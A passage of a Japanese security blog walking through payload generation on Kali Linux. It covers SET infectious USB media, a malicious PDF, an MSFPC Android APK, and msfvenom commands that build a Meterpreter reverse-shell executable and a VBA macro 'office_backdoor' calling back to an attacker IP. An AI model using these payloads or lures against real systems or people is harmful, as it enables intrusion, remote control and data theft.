shikata ga nai

Private? There is no such things.

SETでメディアドライブをつくってみた

Hello there, ('ω')ノ

 

メディアドライブを作成する方法は。

Kali Linuxで、ソーシャルエンジニアリングツールキットを選択して。

下記の手順で、悪意のあるペイロードを生成して。

 

f:id:ThisIsOne:20200530171901p:plain


あとは、LHOSTのIPアドレスとリッスンポートを設定だけ。

 

f:id:ThisIsOne:20200530172131p:plain


/root /.set/にautorunフォルダができるので。

このフォルダをUSBやCD/DVDにコピーして、ターゲットに配布することに。

いつものように攻撃者は、リスナーを設定してターゲットの感染を待つばかり。

 

f:id:ThisIsOne:20200530171721p:plain

 

Best regards, (^^ゞ

SETで悪意のあるPDFをつくってみた

Hello there, ('ω')ノ

 

ターゲットのシステムが強化され、パッチが適用されていて。

最新のセキュリティソフトウェアも配備されていて。

技術的に攻撃者が脆弱性を見つけて悪用することは非常に困難で。

ソーシャルエンジニアリングは、システムのセキュリティ制御を回避して。

人間の行動を操作する技術で。

 

まずは、Kali LinuxのメニューからSocial Engineering Toolkitを 選択して。

 

f:id:ThisIsOne:20200529192737p:plain

 

悪意のあるPDFを生成するには、下記のメニューを選択していって。

 

f:id:ThisIsOne:20200529193014p:plain

 

下記のメニューを選択して。

 

f:id:ThisIsOne:20200529193242p:plain

 

最後に攻撃者のIPアドレスとポート番号を設定して。

 

f:id:ThisIsOne:20200529193657p:plain

 

攻撃用PDFファイルは、/root/.set/に作成されて。

これをなんらかの手段を使って、ターゲットに送信するわけで。

 

f:id:ThisIsOne:20200529194325p:plain

 

攻撃者は、リスナーを開始する必要があって。

 

f:id:ThisIsOne:20200530054644p:plain

 

PDFファイルを受け取ったターゲットはAdobe Readeで開くと何も気づくことはなく。

 

f:id:ThisIsOne:20200530052525p:plain

 

Best regards, (^^ゞ

MSFPCでクイックペイロードをつくってみた

Hello there, ('ω')ノ

 

ペイロードをすばやく生成したい場合は、MSFPCツールが役に立って。

MSFPCは、バックエンドでmsfvenomと同じツールを使用していて。

MSFPCはペイロードを生成するために1つの引数を必要とするだけで。

MSFPCを開始するには、下記のコマンドで。

 msfpc

 

f:id:ThisIsOne:20200529180411p:plain

 

Androidをターゲットにするケースだと下記のコマンドを入力して。

 msfpc apk

 

するとシステムで使用可能なネットワークインターフェイスの一覧を表示されて。

リバース接続に使用するIPアドレスを尋ねられるので選択すると。

APKペイロードが作成されて、/rootディレクトリに保存され。

ペイロードのほかにMSFハンドラスクリプトも作成されて。

 

f:id:ThisIsOne:20200529180535p:plain

 

Best regards, (^^ゞ

msfvenomでペイロードをつくってみた

Hello there, ('ω')ノ

  

これまで、Metasploit Frameworkには、下記の2つのユーティリティがあって。

 

 msfpayload

  指定された形式でペイロードを生成するために使用され

 

 msfencode

  アルゴリズムを使用してペイロードをエンコードおよび難読化するために使用され

 

ただ、最新バージョンでは、これらのユーティリティがmsfvenomに統合されて。

msfvenomは独立したユーティリティなので。

msfconsoleを同時に実行する必要はくて。

 

使用可能なすべてのペイロードを一覧表示するには、下記コマンドで。

 msfvenom --list payloads

f:id:ThisIsOne:20200529121307p:plain

 

利用可能なすべてのエンコーダを一覧表示するには、下記コマンドで。

 msfvenom --list coders

 

f:id:ThisIsOne:20200529121436p:plain

 

下記のコマンドで、ペイロードの生成もできて。

IPアドレス192.168.1.27のポート8080でMeterpreterリスナーを起動するといった。

 

 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.27 lport=8080 -f exe > /root/reverse_tcp.exe

 

f:id:ThisIsOne:20200529144023p:plain

 

できあがったペイロードファイルをWindowsへ配布して、実行すると。

 

f:id:ThisIsOne:20200529144238p:plain

 

下記のように設定したリスナーにアクティブなMeterpreterセッションが返されて。

 

f:id:ThisIsOne:20200529143801p:plain

 

また、下記のようにVBA形式で生成されたペイロードだと。

Word / Excelドキュメントのマクロに埋め込むことができて。

 

 msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.27 LPORT=443 EXITFUNC=thread -f python -e x86/shikata_ga_nai -f vba -o /root/office_backdoor

 

f:id:ThisIsOne:20200529145007p:plain

 

Best regards, (^^ゞ

Metasploitの詳細サイトについて列挙してみた

Hello there, ('ω')ノ

 

Metasploitの詳細を確認するのには下記のサイトが役立って。

 https://www.offensive-security.com/metasploit-unleashed/

 

f:id:ThisIsOne:20200527154004p:plain

 

 http://resources.metasploit.com/

 

f:id:ThisIsOne:20200527154059p:plain

 

 https://metasploit.help.rapid7.com/docs

 

f:id:ThisIsOne:20200527154146p:plain

 

 Metasploit WebインターフェースのMetasploit CEのダウンロードをダウンロードして。

  https://www.rapid7.com/products/metasploit/download/community/thank-you/

 

f:id:ThisIsOne:20200528170626p:plain


 アクティベーションキーを取得しようとしてもできず。

 

f:id:ThisIsOne:20200528174730p:plain

 

Rapid7とチャットで質問していたら、どうやらCE版は提供終了するようで。

一応、試用期間限定でPRO版をインストールしたものの14日程度で。

購入するとなると金額も高いので却下することにして。

 

f:id:ThisIsOne:20200529080153p:plain

 

Best regards, (^^ゞ

コロナを甘く見るな!ひとりひとりの自覚をもった行動で医療従事者を助けよう。

f:id:ThisIsOne:20200404115457p:plain